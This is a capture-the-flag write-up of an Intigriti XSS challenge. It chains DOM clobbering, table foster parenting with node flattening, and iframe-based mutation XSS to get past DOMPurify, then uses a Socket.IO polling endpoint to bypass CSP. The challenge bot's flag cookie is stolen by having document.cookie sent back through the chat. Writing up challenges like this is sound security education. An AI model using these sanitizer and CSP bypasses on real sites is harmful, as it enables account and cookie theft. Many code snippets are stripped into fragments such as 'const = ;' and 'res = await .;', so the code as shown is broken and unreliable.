This month, I authored a difficult XSS challenge for Intigriti, ending up with only a few impressive solves. While exploring rabbit holes in another challenge, the idea for this one occurred to me, and I eventually got it to work after a lot of trial and error. That made for a fun Mutation XSS technique, combined with another more practical one to bypass CSPs using a powerful Socket.IO gadget.
You can still play the challenge at challenge-0725.intigriti.io before I spoil the solution. If you're just here to learn the techniques, here's a breakdown.
Summary:
- Notice DOMPurify allows
id=
attributes to DOM Clobberdocument.getElementById(...)
calls, but only if the injected element comes before the original one. Our input gets injected into a<div id="chat-messages">
normally. - By nesting many
<table>
elements, node flattening is reached after 512 elements, and an element<iframe>
can be put where it isn't supposed to. After the reparse, the iframe gets moved out, above the table, allowing it to clobberid="chat-messages"
. - Sending a second message now writes into the iframe's children, which are not escaped on serialization. Because it is a raw text element, it can be closed by
<a id="</iframe>">
to allow Mutation XSS. - Bypass the CSP using the Socket.IO polling endpoint, by sending a request for an invalid namespace that reflects the name in valid JavaScript syntax (
44/alert(origin),{"message":"Invalid namespace"}
). 💥
The Challenge
Upon first visiting the challenge page, we see a login screen that asks for a username to start a chat. In the bottom-right corner, there is also a button to download the challenge's source code:
We can download the source, unzip it, and then use docker compose up --build
to start it locally. After that, it will be available on http://localhost:3000 for testing.
Entering a username, we get redirected to a random /chat/:uuid
URL and see a chat interface:
Multiple users can join this to interact, and there is an Invite Bot button, which is the bot that we need to XSS to get the flag. We can see this in the code (app/index.js
):
...
;
;
The GET endpoint shows a simple interface for passing a channel ID (the UUID in the URL), and sends a POST request to trigger the bot (app/bot.js
):
The bot enters the chat and sends a message, then sits there for 10 seconds before leaving. Somehow, during this time, we need to trigger an XSS on them to leak the flag stored in their flag=
cookie.
The messaging is implemented using Socket.IO with a channel for each chat on the server-side. Apart from that, there are no dynamic endpoints, everything returns static HTML (app/index.js
) and a consistent list of security headers using middleware:
const = ;
;
;
;
;
;
...
For XSS, we should focus on the client-side, especially JavaScript, to figure out how malicious scripts may be executed. The chat involves quite a bit of logic. Upon loading the page, we join the channel using Socket.IO and can send messages by submitting a form (app/public/chat.js
):
const = ;
;
// Send message
;
The server handles this with the following function (app/index.js
):
;
Simply relaying the message to everyone connected to the channel. They receive it in the following handler (app/public/chat.js
):
// Receive messages
;
It creates a timestamp, a username, and a message text element. The latter is much more interesting than the rest because it parses our message.text
as HTML using DOMPurify.
Another thing of note is the line all the way at the bottom, document.body.innerHTML = document.body.innerHTML
. While assigning a property to itself may look like it does nothing, in this case, reading and assigning to the .innerHTML
will first serialize and then reparse the DOM, known as a "round-trip". This is interesting in the case of HTML because, as the specification warns, the tree before and after a round trip may be different! (spec)
DOM Clobbering
One attack that HTML sanitizers can hardly protect against is DOM Clobbering. It makes use of the strange feature in JavaScript where HTML elements are accessible via a shorthand by their id=
attribute on the window
object. For example, an element like <img id="something">
will be accessible via the global variable something
. Such gadgets are not in this application, though, but a more direct one is.
There are many uses of document.getElementById(...)
, which essentially does the same. DOMPurify won't sanitize id=
attributes, so we can try to hijack any of the elements the page looks for. One interesting target is chat-messages
, because our HTML gets inserted into it every time a message is received. If we can override it with some obscure element that has special parsing rules, we may be able to do something similar to what @kevin_mizu presented here.
Before going there, we still need to make DOM Clobbering work. We can try to inject <svg id="chat-messages">
, which will be allowed, but isn't instantly useful to overwrite document.getElementById("chat-messages")
:
The problem is that it always returns the first element found in the tree, which can never be our input because our input is necessarily inside of the real chat messages, so it must come after it as a child. We either need to give up on this idea, or find a way to write our element somewhere before the regular chat messages element.
In previous Mutation XSS related writeups, a feature caught my attention. It's called "foster parenting" and is unique to <table>
elements. What it does is move invalid elements in a table above it, for example:
Hello, world!
Turns into:
Hello, world!
The elements are suddenly re-ordered, which sounds useful for solving our problem. If we can just write an invalid element while the parser is in the "in-table" insertion mode, it should pop the element out somewhere higher, earlier in the DOM. It just so happens (😉) that the chat.html
page is wrapped in a table layout like this:
...
Instant Realtime Communication
...
...
Creating an invalid element inside the <div id="chat-messages">
may pop it out above the top-most <table>
, which will then be first in the DOM, and allow us to clobber chat-messages
!
Creating an invalid element like this is easier said than done. Because our input is inside a <td>
tag, it switches to the "in cell" insertion mode. From here, whatever tag we start has two possible options:
The "Anything else" case is just parsing as a regular body, there is no chance to trigger foster parenting there. We need to get back to the table. It looks like <caption>
, <col>
and similar tags might allow this though, we can try (Dom-Explorer):
This looks good! Would <col><div id="clobbered">
pass DOMPurify? The source code says it should, but when trying to do so, it still gets sanitized:
// '<div id="clobbered"></div>'
Looking further, even without sanitizing it gets removed when using DOMParser.parseFromString()
:
new...
// '<div id="clobbered"></div>'
Is the browser sanitizing this by itself?! No, this happens because <col>
is not valid in the body context that it starts in:
Unfortunately, this overlaps with all alternative elements we found to escape the <td>
, these are ignored while parsing the body and not in a table. We can't escape the <td>
because all elements that would allow it aren't allowed directly in the <body>
.
Node flattening
At this point, you may be thinking about nested tables and how the parsing would interact there. Maybe it's possible to make some combination of elements allowed in the "in body" insertion mode, so that DOMPurify can let it through. When the browser inserts it into the DOM, it won't be valid in the body to foster parent our injected element to the top of the table.
Another good idea for creating weird situations is a trick semi-recently discovered by @IcesFont which triggered a chain reaction of many DOMPurify bypasses in a short time. The trick utilizes "node flattening", where the browser will limit how deeply nested elements may be. Simply said, it will stop nesting the elements after 512 levels:
<-- Notice these don't go deeper
The important fact here is that during serialization, the deeper elements also aren't nested anymore; in the above example, it will end up with 3 self-closing <div>
tags. Remember the document.body.innerHTML = document.body.innerHTML
operation we noticed? It causes a round-trip, which is serialization and reparsing. We can create a DOM tree that's parsed as a lot of nested elements and inserted into the DOM as such. During serialization, the deepest nested elements are flattened, causing them to get into situations that may normally be impossible. The parsing will then have to deal with that and potentially cause mutations.
For this challenge, we can make an example with a table deeply nested to the limit. Once flattened and reparsed, the result is very interesting (Dom-Explorer):
The first DomParser represents what DOMPurify sees (minus the <table><tr><td>
prefix), everything is deeply nested but still inside the root table. However, the second DomParser is what the DOM looks like after a round trip, the <div id="chat-messages">
has moved up above the topmost <table>
. This is because after the first parsing, node flattening pushed it out of its <td>
. It is now directly inside the <tbody>
, which isn't allowed, so foster parenting moves it up above the table. Because it has now moved above the real chat-messages
, we should have clobbered the element, and any future messages will be inserted into it!
Mutation XSS
Now back to our original plan, what if we made the clobbered element a special one like <svg>
, then use the following payload, which worked in DOMPurify 3.0.6:
a
Unfortunately, the above payload doesn't make it through the latest version anymore (Dom-Explorer):
a
Both the <style>
and the <a>
tag's id=
attribute were removed. The first is due to this check (/<[/\w!]/g
), which removes any elements without children that still contain HTML tags, such as our <style>
tag. The second is due to this other check (/((--!?|])>)|<\/(style|title)/i
) that sanitizes attributes containing closing comments, style
, and title
tags. These checks are to harden against some known namespace confusion attacks and make it much harder to achieve a bypass.
Still, we have a pretty powerful primitive on our hands. We are able to target DOMPurify's output into any element we want. Instead of stopping at <svg>
, why not directly insert into a <style>
tag? Then DOMPurify will try to sanitize it as HTML, but it's inserted as CSS. These are very different contexts. We could write something like <a id="</style><img src onerror=alert()>">
, for example, which DOMPurify will see as just an <a>
tag with an attribute, while surrounded with a style tag it closes upon seeing </style>
and then back in HTML, triggers XSS with the image.
Unfortunately this hits the extra attribute check from DOMPurify again... What other tags similar to <style>
are there that serialize their contents without escaping them, and parse as text? This is actually a pretty well-defined selection:
We get to choose between style
, script
, xmp
, iframe
, noembed
, noframes
, or plaintext
. Of these, only style
is allowed by default. But the configuration we're dealing with has an exception:
We're allowed <iframe>
tags, and the best thing, a closing </iframe>
tag is allowed in attributes by the DOMPurify regular expression! This means our solution will be to use DOM Clobbering to create an <iframe id="chat-message">
, for us to write a 2nd message that will write into there the content: <a id="</iframe><img src onerror=alert(origin)>">
. After the round-trip, this should interpret the image as a real HTML tag and trigger the XSS. Let's try it:
Success! Well... kind of. We successfully injected our XSS payload, but it doesn't trigger yet because of a CSP. What is it defined as?
Alright, no obvious bypasses yet, we'll have to investigate this a little further before we see our shiny alert.
CSP Bypass using Socket.IO
script-src 'self'
is most important to us, because at some point we want to run scripts. The rule means we may only load scripts from the current host, so any relative paths. There aren't many in this challenge because all endpoints only return static HTML, JS, or CSS files. But we can see one creeping around in our Network tab:
This Socket.IO endpoint with ?transport=polling
returns some weirdly formatted data in Content-Type: text/plain
. It's a simple GET request with a special URL. Is there a chance we could use such a response containing arbitrary JavaScript to bypass the CSP? You might quickly say no because the /chat/:uuid
endpoint responds with:
But it is important to understand that this header only applies to the request it is set on, not the whole document. These SocketIO responses don't have X-Content-Type-Options:
so by default they are allowed to be loaded as any content type, including JavaScript. But can we really make this weird custom protocol return valid JavaScript to perform our flag exfiltration?
We already see examples where part of our input, the messages, are returned in the response. But the problem is that these are always correctly JSON-formatted coming from the server. Still, they happen to be valid JavaScript, promising if we're able to find variations of this.
> 42
< undefined
https://socket.io/intigriti_xss_0725_v4/socket-io-protocol/
We can read the above protocol description to learn about all the different things it can output. One example stands out:
With a custom namespace:
Packet:{ type: EVENT, namespace: "/admin", data: ["bar"] }
Encoded:2/admin,["bar"]
If we were to run this in JavaScript, it would try to resolve the admin
variable. We can replace it with alert()
later:
> 2/admin,
< Uncaught ReferenceError: admin is not defined
But this is a packet from the client, we need one that the server sends to us as a response. Let's try to forge the above packet anyway and see what the server does with it:
.
The error in the response is... wait...
44/,
The error message is valid JavaScript, including our namespace input! All we have to do now is prepare such a URL without requesting it ourselves, as that would delete the response. Polling works like this:
- Request a new session ID
- Start a GET request that won't get a response yet
- Send a POST request with your message
- Finally, the GET request from step 2 gets resolved to the result from step 3
So we simply need to do steps 1 and 3 on our side, then craft the URL one would normally request for step 2 and give it to the victim, so that step 4 happens inside their browser during the XSS. It should return our prepared content and execute some JavaScript payload.
Half-following the protocol like this isn't possible with the official Socket.IO API, so we'll have to go a bit more manually using raw fetch()
requests inspired by what we see in the Network tab going back and forth:
// Step 1 (request session ID)
res = await .;
sid = ;
// Step 3 (send POST message)
await ;
// Step 2 (craft URL for response)
url = + new;
;
This prints a URL that, when viewed in the browser, responds with:
44/,
We now need to put this into a <script src="...">
using our Mutation XSS, to get it to bypass the CSP. Because our sink of .innerHTML
doesn't execute script tags, we need to wrap it in an <iframe srcdoc="...">
, which creates a new document that does load script tags. This is no problem for us at this point, because we've completely bypassed the sanitizer.
The JavaScript snippet below will trigger the XSS via the received messages:
The final goal is to steal the flag=
cookie from the Bot. We can invite it to our chat, and then send the above messages again to trigger XSS on it and exfiltrate the cookies. All that's left to do is update the POST body to use a flag-stealing payload like reading document.cookie
and sending it as a message back to us.
body:
Then, sending it over the chat right after we invite the bot to it, making sure not to XSS ourselves at this point, as it would invalidate the polling URL. This can simply be done by overwriting some function like DOMPurify.sanitize = console.log;
.
// Run this when the bot joins right after pressing *Invite Bot*
DOMPurify. = console.log; // Prevent XSS'ing ourselves, but still see response messages
res = await .;
sid = ;
await ;
url = + new;
If timed correctly, we quickly receive a message back from the bot containing the flag!
flag=CTF{st4Ck1Ng_T4Bl3S_'t1Ll_1T_C0M3S_Cr4Sh1Ng_D0Wn,_S0Ck3T10_1S_Such_4_Gr34T_G4Dg3T!}